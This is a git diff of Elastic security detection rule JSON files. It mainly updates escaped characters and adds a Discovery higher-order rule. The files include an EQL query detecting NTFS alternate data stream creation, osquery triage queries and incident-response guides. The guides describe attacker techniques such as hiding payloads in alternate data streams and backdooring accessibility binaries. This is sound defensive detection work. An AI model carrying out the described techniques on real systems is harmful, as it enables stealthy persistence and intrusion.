suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json index de350f62b31..55bf50d18e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json index b4928d47a6a..87c521b6f3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json index b8d7413e4be..5d625a6cf4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json index 56601ff6284..a04fee34fa0 100644 --- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json index dca5f2b0110..1264003cf19 100644 --- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json +++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json index 079369a9207..f170e571e91 100644 --- a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json index a95e27ae257..a32761c3729 100644 --- a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json index 2fd4dfb5ecd..21d03121e00 100644 --- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json +++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json index ebe362733df..f17c9d6a23f 100644 --- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json +++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json index 5e90aa5b253..bc2a686e09a 100644 --- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json +++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json index 1221f5b7473..b4be217b1f9 100644 --- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json +++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json index 3b923ac038f..8db02e3449a 100644 --- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json +++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json index 68df969c8ec..6a544d86274 100644 --- a/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json +++ b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_2.json b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_2.json new file mode 100644 index 00000000000..d1e84fcabc8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_2.json @@ -0,0 +1,65 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages Discovery building block rule alert data to alert on signals with unusual unique host.id, user.id and process.executable entries.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + ".alerts-security.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Unusual Discovery Signal Alert with Unusual Process Executable", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "host.os.type:windows and event.kind:signal and kibana.alert.rule.rule_id:\"1d72d014-e2ab-4707-b056-9b96abe7b511\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "kibana.alert.rule.rule_id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "72ed9140-fe9d-4a34-a026-75b50e484b17", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: Higher-Order Rule" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "72ed9140-fe9d-4a34-a026-75b50e484b17_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json index 0eaaaf3d587..2f8713e9f8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the 